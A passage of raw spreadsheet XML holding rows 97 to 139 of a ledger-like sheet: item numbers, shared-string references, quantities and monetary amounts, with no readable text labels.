      <c r="L97" s="10"/>
    </row>
    <row r="98" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A98" s="93"/>
      <c r="B98" s="88">
        <v>92</v>
      </c>
      <c r="C98" s="237" t="s">
        <v>2974</v>
      </c>
      <c r="D98" s="238" t="s">
        <v>2975</v>
      </c>
      <c r="E98" s="238" t="s">
        <v>2976</v>
      </c>
      <c r="F98" s="9"/>
      <c r="G98" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H98" s="11">
        <v>1</v>
      </c>
      <c r="I98" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J98" s="126">
        <v>54000</v>
      </c>
      <c r="K98" s="99">
        <v>5616</v>
      </c>
      <c r="L98" s="10"/>
    </row>
    <row r="99" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A99" s="93"/>
      <c r="B99" s="88">
        <v>93</v>
      </c>
      <c r="C99" s="237" t="s">
        <v>2977</v>
      </c>
      <c r="D99" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E99" s="238" t="s">
        <v>2978</v>
      </c>
      <c r="F99" s="9"/>
      <c r="G99" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H99" s="11">
        <v>1</v>
      </c>
      <c r="I99" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J99" s="126">
        <v>126000</v>
      </c>
      <c r="K99" s="99">
        <v>0</v>
      </c>
      <c r="L99" s="10"/>
    </row>
    <row r="100" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A100" s="93"/>
      <c r="B100" s="88">
        <v>94</v>
      </c>
      <c r="C100" s="237" t="s">
        <v>2979</v>
      </c>
      <c r="D100" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E100" s="238" t="s">
        <v>2980</v>
      </c>
      <c r="F100" s="9"/>
      <c r="G100" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H100" s="11">
        <v>3</v>
      </c>
      <c r="I100" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J100" s="126">
        <v>360000</v>
      </c>
      <c r="K100" s="99">
        <v>0</v>
      </c>
      <c r="L100" s="10"/>
    </row>
    <row r="101" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A101" s="93"/>
      <c r="B101" s="88">
        <v>95</v>
      </c>
      <c r="C101" s="237" t="s">
        <v>2981</v>
      </c>
      <c r="D101" s="238" t="s">
        <v>2982</v>
      </c>
      <c r="E101" s="238" t="s">
        <v>2983</v>
      </c>
      <c r="F101" s="9"/>
      <c r="G101" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H101" s="11">
        <v>1</v>
      </c>
      <c r="I101" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J101" s="126">
        <v>40500</v>
      </c>
      <c r="K101" s="99">
        <v>0</v>
      </c>
      <c r="L101" s="10"/>
    </row>
    <row r="102" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A102" s="93"/>
      <c r="B102" s="88">
        <v>96</v>
      </c>
      <c r="C102" s="237" t="s">
        <v>2984</v>
      </c>
      <c r="D102" s="238" t="s">
        <v>2985</v>
      </c>
      <c r="E102" s="10"/>
      <c r="F102" s="9"/>
      <c r="G102" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H102" s="11">
        <v>1</v>
      </c>
      <c r="I102" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J102" s="126">
        <v>200000</v>
      </c>
      <c r="K102" s="99">
        <v>0</v>
      </c>
      <c r="L102" s="10"/>
    </row>
    <row r="103" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A103" s="93"/>
      <c r="B103" s="88">
        <v>97</v>
      </c>
      <c r="C103" s="237" t="s">
        <v>2986</v>
      </c>
      <c r="D103" s="238" t="s">
        <v>2987</v>
      </c>
      <c r="E103" s="238" t="s">
        <v>2988</v>
      </c>
      <c r="F103" s="9"/>
      <c r="G103" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H103" s="11">
        <v>1</v>
      </c>
      <c r="I103" s="238" t="s">
        <v>958</v>
      </c>
      <c r="J103" s="126">
        <v>13500</v>
      </c>
      <c r="K103" s="99">
        <v>1404</v>
      </c>
      <c r="L103" s="10"/>
    </row>
    <row r="104" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A104" s="93"/>
      <c r="B104" s="88">
        <v>98</v>
      </c>
      <c r="C104" s="237" t="s">
        <v>2989</v>
      </c>
      <c r="D104" s="238" t="s">
        <v>2990</v>
      </c>
      <c r="E104" s="10"/>
      <c r="F104" s="9"/>
      <c r="G104" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H104" s="11">
        <v>1</v>
      </c>
      <c r="I104" s="238" t="s">
        <v>962</v>
      </c>
      <c r="J104" s="126">
        <v>35000</v>
      </c>
      <c r="K104" s="99">
        <v>3640</v>
      </c>
      <c r="L104" s="10"/>
    </row>
    <row r="105" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A105" s="93"/>
      <c r="B105" s="88">
        <v>99</v>
      </c>
      <c r="C105" s="237" t="s">
        <v>2991</v>
      </c>
      <c r="D105" s="238" t="s">
        <v>2992</v>
      </c>
      <c r="E105" s="238" t="s">
        <v>2993</v>
      </c>
      <c r="F105" s="9"/>
      <c r="G105" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H105" s="11">
        <v>1</v>
      </c>
      <c r="I105" s="238" t="s">
        <v>962</v>
      </c>
      <c r="J105" s="126">
        <v>143000</v>
      </c>
      <c r="K105" s="99">
        <v>0</v>
      </c>
      <c r="L105" s="10"/>
    </row>
    <row r="106" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A106" s="93"/>
      <c r="B106" s="88">
        <v>100</v>
      </c>
      <c r="C106" s="237" t="s">
        <v>2994</v>
      </c>
      <c r="D106" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E106" s="238" t="s">
        <v>2995</v>
      </c>
      <c r="F106" s="9"/>
      <c r="G106" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H106" s="11">
        <v>1</v>
      </c>
      <c r="I106" s="238" t="s">
        <v>962</v>
      </c>
      <c r="J106" s="126">
        <v>70000</v>
      </c>
      <c r="K106" s="99">
        <v>0</v>
      </c>
      <c r="L106" s="10"/>
    </row>
    <row r="107" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A107" s="93"/>
      <c r="B107" s="88">
        <v>101</v>
      </c>
      <c r="C107" s="237" t="s">
        <v>2996</v>
      </c>
      <c r="D107" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E107" s="238" t="s">
        <v>2997</v>
      </c>
      <c r="F107" s="9"/>
      <c r="G107" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H107" s="11">
        <v>2</v>
      </c>
      <c r="I107" s="238" t="s">
        <v>962</v>
      </c>
      <c r="J107" s="126">
        <v>121250</v>
      </c>
      <c r="K107" s="99">
        <v>0</v>
      </c>
      <c r="L107" s="238" t="s">
        <v>1503</v>
      </c>
    </row>
    <row r="108" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A108" s="93"/>
      <c r="B108" s="88">
        <v>102</v>
      </c>
      <c r="C108" s="237" t="s">
        <v>2998</v>
      </c>
      <c r="D108" s="238" t="s">
        <v>2999</v>
      </c>
      <c r="E108" s="10"/>
      <c r="F108" s="9"/>
      <c r="G108" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H108" s="11">
        <v>2</v>
      </c>
      <c r="I108" s="238" t="s">
        <v>871</v>
      </c>
      <c r="J108" s="126">
        <v>134000</v>
      </c>
      <c r="K108" s="99">
        <v>13936</v>
      </c>
      <c r="L108" s="10"/>
    </row>
    <row r="109" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A109" s="93"/>
      <c r="B109" s="88">
        <v>103</v>
      </c>
      <c r="C109" s="237" t="s">
        <v>3000</v>
      </c>
      <c r="D109" s="238" t="s">
        <v>3001</v>
      </c>
      <c r="E109" s="238" t="s">
        <v>3002</v>
      </c>
      <c r="F109" s="9"/>
      <c r="G109" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H109" s="11">
        <v>1</v>
      </c>
      <c r="I109" s="238" t="s">
        <v>871</v>
      </c>
      <c r="J109" s="126">
        <v>124100</v>
      </c>
      <c r="K109" s="99">
        <v>0</v>
      </c>
      <c r="L109" s="10"/>
    </row>
    <row r="110" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A110" s="93"/>
      <c r="B110" s="88">
        <v>104</v>
      </c>
      <c r="C110" s="237" t="s">
        <v>3003</v>
      </c>
      <c r="D110" s="238" t="s">
        <v>2896</v>
      </c>
      <c r="E110" s="238" t="s">
        <v>3004</v>
      </c>
      <c r="F110" s="9"/>
      <c r="G110" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H110" s="11">
        <v>1</v>
      </c>
      <c r="I110" s="238" t="s">
        <v>871</v>
      </c>
      <c r="J110" s="126">
        <v>1159200</v>
      </c>
      <c r="K110" s="99">
        <v>224744</v>
      </c>
      <c r="L110" s="10"/>
    </row>
    <row r="111" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A111" s="93"/>
      <c r="B111" s="88">
        <v>105</v>
      </c>
      <c r="C111" s="237" t="s">
        <v>3005</v>
      </c>
      <c r="D111" s="238" t="s">
        <v>1173</v>
      </c>
      <c r="E111" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="F111" s="9"/>
      <c r="G111" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H111" s="11">
        <v>1</v>
      </c>
      <c r="I111" s="238" t="s">
        <v>262</v>
      </c>
      <c r="J111" s="126">
        <v>15400</v>
      </c>
      <c r="K111" s="99">
        <v>616</v>
      </c>
      <c r="L111" s="10"/>
    </row>
    <row r="112" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A112" s="93"/>
      <c r="B112" s="88">
        <v>106</v>
      </c>
      <c r="C112" s="237" t="s">
        <v>3007</v>
      </c>
      <c r="D112" s="238" t="s">
        <v>3008</v>
      </c>
      <c r="E112" s="238" t="s">
        <v>3009</v>
      </c>
      <c r="F112" s="9"/>
      <c r="G112" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H112" s="11">
        <v>1</v>
      </c>
      <c r="I112" s="238" t="s">
        <v>965</v>
      </c>
      <c r="J112" s="126">
        <v>2161809</v>
      </c>
      <c r="K112" s="99">
        <v>224744</v>
      </c>
      <c r="L112" s="10"/>
    </row>
    <row r="113" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A113" s="93"/>
      <c r="B113" s="88">
        <v>107</v>
      </c>
      <c r="C113" s="237" t="s">
        <v>3010</v>
      </c>
      <c r="D113" s="238" t="s">
        <v>3011</v>
      </c>
      <c r="E113" s="238" t="s">
        <v>3012</v>
      </c>
      <c r="F113" s="9"/>
      <c r="G113" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H113" s="11">
        <v>1</v>
      </c>
      <c r="I113" s="238" t="s">
        <v>965</v>
      </c>
      <c r="J113" s="126">
        <v>18399.12</v>
      </c>
      <c r="K113" s="99">
        <v>0</v>
      </c>
      <c r="L113" s="10"/>
    </row>
    <row r="114" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A114" s="93"/>
      <c r="B114" s="88">
        <v>108</v>
      </c>
      <c r="C114" s="237" t="s">
        <v>3013</v>
      </c>
      <c r="D114" s="238" t="s">
        <v>3014</v>
      </c>
      <c r="E114" s="238" t="s">
        <v>3015</v>
      </c>
      <c r="F114" s="9"/>
      <c r="G114" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H114" s="11">
        <v>1</v>
      </c>
      <c r="I114" s="238" t="s">
        <v>965</v>
      </c>
      <c r="J114" s="126">
        <v>16906</v>
      </c>
      <c r="K114" s="99">
        <v>676</v>
      </c>
      <c r="L114" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="115" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A115" s="93"/>
      <c r="B115" s="88">
        <v>109</v>
      </c>
      <c r="C115" s="237" t="s">
        <v>3016</v>
      </c>
      <c r="D115" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E115" s="238" t="s">
        <v>3017</v>
      </c>
      <c r="F115" s="9"/>
      <c r="G115" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H115" s="11">
        <v>1</v>
      </c>
      <c r="I115" s="238" t="s">
        <v>3018</v>
      </c>
      <c r="J115" s="126">
        <v>84000</v>
      </c>
      <c r="K115" s="99">
        <v>11424</v>
      </c>
      <c r="L115" s="10"/>
    </row>
    <row r="116" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A116" s="93"/>
      <c r="B116" s="88">
        <v>110</v>
      </c>
      <c r="C116" s="237" t="s">
        <v>3019</v>
      </c>
      <c r="D116" s="238" t="s">
        <v>3020</v>
      </c>
      <c r="E116" s="10"/>
      <c r="F116" s="9"/>
      <c r="G116" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H116" s="11">
        <v>1</v>
      </c>
      <c r="I116" s="238" t="s">
        <v>3021</v>
      </c>
      <c r="J116" s="126">
        <v>44739</v>
      </c>
      <c r="K116" s="99">
        <v>6079.2</v>
      </c>
      <c r="L116" s="10"/>
    </row>
    <row r="117" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A117" s="93"/>
      <c r="B117" s="88">
        <v>111</v>
      </c>
      <c r="C117" s="237" t="s">
        <v>3022</v>
      </c>
      <c r="D117" s="238" t="s">
        <v>3023</v>
      </c>
      <c r="E117" s="238" t="s">
        <v>3024</v>
      </c>
      <c r="F117" s="9"/>
      <c r="G117" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H117" s="11">
        <v>1</v>
      </c>
      <c r="I117" s="238" t="s">
        <v>3021</v>
      </c>
      <c r="J117" s="126">
        <v>15000</v>
      </c>
      <c r="K117" s="99">
        <v>2040</v>
      </c>
      <c r="L117" s="10"/>
    </row>
    <row r="118" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A118" s="93"/>
      <c r="B118" s="88">
        <v>112</v>
      </c>
      <c r="C118" s="237" t="s">
        <v>3025</v>
      </c>
      <c r="D118" s="238" t="s">
        <v>3026</v>
      </c>
      <c r="E118" s="238" t="s">
        <v>3027</v>
      </c>
      <c r="F118" s="9"/>
      <c r="G118" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H118" s="11">
        <v>1</v>
      </c>
      <c r="I118" s="238" t="s">
        <v>1780</v>
      </c>
      <c r="J118" s="126">
        <v>8000</v>
      </c>
      <c r="K118" s="99">
        <v>1088</v>
      </c>
      <c r="L118" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="119" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A119" s="93"/>
      <c r="B119" s="88">
        <v>113</v>
      </c>
      <c r="C119" s="237" t="s">
        <v>3028</v>
      </c>
      <c r="D119" s="238" t="s">
        <v>3029</v>
      </c>
      <c r="E119" s="238" t="s">
        <v>3030</v>
      </c>
      <c r="F119" s="9"/>
      <c r="G119" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H119" s="11">
        <v>1</v>
      </c>
      <c r="I119" s="238" t="s">
        <v>1780</v>
      </c>
      <c r="J119" s="126">
        <v>4350</v>
      </c>
      <c r="K119" s="99">
        <v>591.6</v>
      </c>
      <c r="L119" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="120" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A120" s="93"/>
      <c r="B120" s="88">
        <v>114</v>
      </c>
      <c r="C120" s="237" t="s">
        <v>3031</v>
      </c>
      <c r="D120" s="238" t="s">
        <v>3032</v>
      </c>
      <c r="E120" s="238" t="s">
        <v>3015</v>
      </c>
      <c r="F120" s="9"/>
      <c r="G120" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H120" s="11">
        <v>1</v>
      </c>
      <c r="I120" s="238" t="s">
        <v>1780</v>
      </c>
      <c r="J120" s="126">
        <v>39590</v>
      </c>
      <c r="K120" s="99">
        <v>5372</v>
      </c>
      <c r="L120" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="121" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A121" s="93"/>
      <c r="B121" s="88">
        <v>115</v>
      </c>
      <c r="C121" s="237" t="s">
        <v>3033</v>
      </c>
      <c r="D121" s="238" t="s">
        <v>3034</v>
      </c>
      <c r="E121" s="238" t="s">
        <v>3035</v>
      </c>
      <c r="F121" s="9"/>
      <c r="G121" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H121" s="11">
        <v>1</v>
      </c>
      <c r="I121" s="238" t="s">
        <v>972</v>
      </c>
      <c r="J121" s="126">
        <v>3883017.44</v>
      </c>
      <c r="K121" s="99">
        <v>528088</v>
      </c>
      <c r="L121" s="10"/>
    </row>
    <row r="122" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A122" s="93"/>
      <c r="B122" s="88">
        <v>116</v>
      </c>
      <c r="C122" s="237" t="s">
        <v>3036</v>
      </c>
      <c r="D122" s="238" t="s">
        <v>3037</v>
      </c>
      <c r="E122" s="238" t="s">
        <v>3038</v>
      </c>
      <c r="F122" s="9"/>
      <c r="G122" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H122" s="11">
        <v>2</v>
      </c>
      <c r="I122" s="238" t="s">
        <v>972</v>
      </c>
      <c r="J122" s="126">
        <v>17100</v>
      </c>
      <c r="K122" s="99">
        <v>2325.6</v>
      </c>
      <c r="L122" s="10"/>
    </row>
    <row r="123" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A123" s="93"/>
      <c r="B123" s="88">
        <v>117</v>
      </c>
      <c r="C123" s="237" t="s">
        <v>3039</v>
      </c>
      <c r="D123" s="238" t="s">
        <v>1320</v>
      </c>
      <c r="E123" s="238" t="s">
        <v>3040</v>
      </c>
      <c r="F123" s="9"/>
      <c r="G123" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H123" s="11">
        <v>1</v>
      </c>
      <c r="I123" s="238" t="s">
        <v>3041</v>
      </c>
      <c r="J123" s="126">
        <v>7950</v>
      </c>
      <c r="K123" s="99">
        <v>1081.2</v>
      </c>
      <c r="L123" s="10"/>
    </row>
    <row r="124" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A124" s="93"/>
      <c r="B124" s="88">
        <v>118</v>
      </c>
      <c r="C124" s="237" t="s">
        <v>3042</v>
      </c>
      <c r="D124" s="238" t="s">
        <v>1169</v>
      </c>
      <c r="E124" s="238" t="s">
        <v>3043</v>
      </c>
      <c r="F124" s="9"/>
      <c r="G124" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H124" s="11">
        <v>2</v>
      </c>
      <c r="I124" s="238" t="s">
        <v>1442</v>
      </c>
      <c r="J124" s="126">
        <v>4600</v>
      </c>
      <c r="K124" s="99">
        <v>0</v>
      </c>
      <c r="L124" s="10"/>
    </row>
    <row r="125" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A125" s="93"/>
      <c r="B125" s="88">
        <v>119</v>
      </c>
      <c r="C125" s="237" t="s">
        <v>3044</v>
      </c>
      <c r="D125" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E125" s="238" t="s">
        <v>3045</v>
      </c>
      <c r="F125" s="9"/>
      <c r="G125" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H125" s="11">
        <v>2</v>
      </c>
      <c r="I125" s="238" t="s">
        <v>1442</v>
      </c>
      <c r="J125" s="126">
        <v>102000</v>
      </c>
      <c r="K125" s="99">
        <v>13872</v>
      </c>
      <c r="L125" s="10"/>
    </row>
    <row r="126" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A126" s="93"/>
      <c r="B126" s="88">
        <v>120</v>
      </c>
      <c r="C126" s="237" t="s">
        <v>3046</v>
      </c>
      <c r="D126" s="238" t="s">
        <v>3037</v>
      </c>
      <c r="E126" s="238" t="s">
        <v>3047</v>
      </c>
      <c r="F126" s="9"/>
      <c r="G126" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H126" s="11">
        <v>2</v>
      </c>
      <c r="I126" s="238" t="s">
        <v>3048</v>
      </c>
      <c r="J126" s="126">
        <v>5982.91</v>
      </c>
      <c r="K126" s="99">
        <v>0</v>
      </c>
      <c r="L126" s="10"/>
    </row>
    <row r="127" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A127" s="93"/>
      <c r="B127" s="88">
        <v>121</v>
      </c>
      <c r="C127" s="237" t="s">
        <v>3049</v>
      </c>
      <c r="D127" s="238" t="s">
        <v>3050</v>
      </c>
      <c r="E127" s="238" t="s">
        <v>3051</v>
      </c>
      <c r="F127" s="9"/>
      <c r="G127" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H127" s="11">
        <v>1</v>
      </c>
      <c r="I127" s="238" t="s">
        <v>224</v>
      </c>
      <c r="J127" s="126">
        <v>247371.3</v>
      </c>
      <c r="K127" s="99">
        <v>0</v>
      </c>
      <c r="L127" s="10"/>
    </row>
    <row r="128" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A128" s="93"/>
      <c r="B128" s="88">
        <v>122</v>
      </c>
      <c r="C128" s="237" t="s">
        <v>3052</v>
      </c>
      <c r="D128" s="238" t="s">
        <v>3053</v>
      </c>
      <c r="E128" s="238" t="s">
        <v>3054</v>
      </c>
      <c r="F128" s="9"/>
      <c r="G128" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H128" s="11">
        <v>2</v>
      </c>
      <c r="I128" s="238" t="s">
        <v>224</v>
      </c>
      <c r="J128" s="126">
        <v>10000</v>
      </c>
      <c r="K128" s="99">
        <v>400</v>
      </c>
      <c r="L128" s="10"/>
    </row>
    <row r="129" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A129" s="93"/>
      <c r="B129" s="88">
        <v>123</v>
      </c>
      <c r="C129" s="237" t="s">
        <v>3055</v>
      </c>
      <c r="D129" s="238" t="s">
        <v>532</v>
      </c>
      <c r="E129" s="238" t="s">
        <v>3056</v>
      </c>
      <c r="F129" s="9"/>
      <c r="G129" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H129" s="11">
        <v>1</v>
      </c>
      <c r="I129" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J129" s="126">
        <v>20511</v>
      </c>
      <c r="K129" s="99">
        <v>3444</v>
      </c>
      <c r="L129" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="130" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A130" s="93"/>
      <c r="B130" s="88">
        <v>124</v>
      </c>
      <c r="C130" s="237" t="s">
        <v>3057</v>
      </c>
      <c r="D130" s="238" t="s">
        <v>3058</v>
      </c>
      <c r="E130" s="238" t="s">
        <v>3059</v>
      </c>
      <c r="F130" s="9"/>
      <c r="G130" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H130" s="11">
        <v>1</v>
      </c>
      <c r="I130" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J130" s="126">
        <v>53375</v>
      </c>
      <c r="K130" s="99">
        <v>8954.4</v>
      </c>
      <c r="L130" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="131" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A131" s="93"/>
      <c r="B131" s="88">
        <v>125</v>
      </c>
      <c r="C131" s="237" t="s">
        <v>3060</v>
      </c>
      <c r="D131" s="238" t="s">
        <v>3061</v>
      </c>
      <c r="E131" s="238" t="s">
        <v>3062</v>
      </c>
      <c r="F131" s="9"/>
      <c r="G131" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H131" s="11">
        <v>1</v>
      </c>
      <c r="I131" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J131" s="126">
        <v>141795</v>
      </c>
      <c r="K131" s="99">
        <v>23805.6</v>
      </c>
      <c r="L131" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="132" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A132" s="93"/>
      <c r="B132" s="88">
        <v>126</v>
      </c>
      <c r="C132" s="237" t="s">
        <v>3063</v>
      </c>
      <c r="D132" s="238" t="s">
        <v>3064</v>
      </c>
      <c r="E132" s="238" t="s">
        <v>3065</v>
      </c>
      <c r="F132" s="9"/>
      <c r="G132" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H132" s="11">
        <v>1</v>
      </c>
      <c r="I132" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J132" s="126">
        <v>414920</v>
      </c>
      <c r="K132" s="99">
        <v>69703.2</v>
      </c>
      <c r="L132" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="133" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A133" s="93"/>
      <c r="B133" s="88">
        <v>127</v>
      </c>
      <c r="C133" s="237" t="s">
        <v>3066</v>
      </c>
      <c r="D133" s="238" t="s">
        <v>3067</v>
      </c>
      <c r="E133" s="238" t="s">
        <v>3068</v>
      </c>
      <c r="F133" s="9"/>
      <c r="G133" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H133" s="11">
        <v>1</v>
      </c>
      <c r="I133" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J133" s="126">
        <v>80325</v>
      </c>
      <c r="K133" s="99">
        <v>13490.4</v>
      </c>
      <c r="L133" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="134" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A134" s="93"/>
      <c r="B134" s="88">
        <v>128</v>
      </c>
      <c r="C134" s="237" t="s">
        <v>3069</v>
      </c>
      <c r="D134" s="238" t="s">
        <v>3070</v>
      </c>
      <c r="E134" s="238" t="s">
        <v>3071</v>
      </c>
      <c r="F134" s="9"/>
      <c r="G134" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H134" s="11">
        <v>1</v>
      </c>
      <c r="I134" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J134" s="126">
        <v>51165</v>
      </c>
      <c r="K134" s="99">
        <v>8584.8</v>
      </c>
      <c r="L134" s="10"/>
    </row>
    <row r="135" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A135" s="93"/>
      <c r="B135" s="88">
        <v>129</v>
      </c>
      <c r="C135" s="237" t="s">
        <v>3072</v>
      </c>
      <c r="D135" s="238" t="s">
        <v>271</v>
      </c>
      <c r="E135" s="238" t="s">
        <v>3073</v>
      </c>
      <c r="F135" s="9"/>
      <c r="G135" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H135" s="11">
        <v>1</v>
      </c>
      <c r="I135" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J135" s="126">
        <v>116409</v>
      </c>
      <c r="K135" s="99">
        <v>19555.2</v>
      </c>
      <c r="L135" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="136" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A136" s="93"/>
      <c r="B136" s="88">
        <v>130</v>
      </c>
      <c r="C136" s="237" t="s">
        <v>3074</v>
      </c>
      <c r="D136" s="238" t="s">
        <v>3067</v>
      </c>
      <c r="E136" s="238" t="s">
        <v>3075</v>
      </c>
      <c r="F136" s="9"/>
      <c r="G136" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H136" s="11">
        <v>1</v>
      </c>
      <c r="I136" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J136" s="126">
        <v>136671</v>
      </c>
      <c r="K136" s="99">
        <v>22948.8</v>
      </c>
      <c r="L136" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="137" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A137" s="93"/>
      <c r="B137" s="88">
        <v>131</v>
      </c>
      <c r="C137" s="237" t="s">
        <v>3076</v>
      </c>
      <c r="D137" s="238" t="s">
        <v>3077</v>
      </c>
      <c r="E137" s="238" t="s">
        <v>3078</v>
      </c>
      <c r="F137" s="9"/>
      <c r="G137" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H137" s="11">
        <v>1</v>
      </c>
      <c r="I137" s="238" t="s">
        <v>1021</v>
      </c>
      <c r="J137" s="126">
        <v>8531</v>
      </c>
      <c r="K137" s="99">
        <v>340</v>
      </c>
      <c r="L137" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="138" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A138" s="93"/>
      <c r="B138" s="88">
        <v>132</v>
      </c>
      <c r="C138" s="237" t="s">
        <v>3079</v>
      </c>
      <c r="D138" s="238" t="s">
        <v>3080</v>
      </c>
      <c r="E138" s="238" t="s">
        <v>3006</v>
      </c>
      <c r="F138" s="9"/>
      <c r="G138" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H138" s="11">
        <v>3</v>
      </c>
      <c r="I138" s="238" t="s">
        <v>1000</v>
      </c>
      <c r="J138" s="126">
        <v>74400</v>
      </c>
      <c r="K138" s="99">
        <v>18451.2</v>
      </c>
      <c r="L138" s="10" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="139" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A139" s="93"/>
      <c r="B139" s="88">
        <v>133</v>
      </c>
      <c r="C139" s="237" t="s">
        <v>3081</v>
      </c>
      <c r="D139" s="238" t="s">
        <v>1261</v>
      </c>
      <c r="E139" s="238" t="s">
        <v>494</v>
      </c>
      <c r="F139" s="9"/>
      <c r="G139" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H139" s="11">
        <v>2</v>
      </c>
      <c r="I139" s="238" t="s">
        <v>1000</v>
      </c>
      <c r="J139" s="126">
        <v>24600</v>
      </c>
      <c r="K139" s="99">
        <v>984</v>
      </c>
      <c r="L139" s="10"/>
    </row>
    <row r="140" s="88" customFormat="1" customHeight="1" spans="1:12">
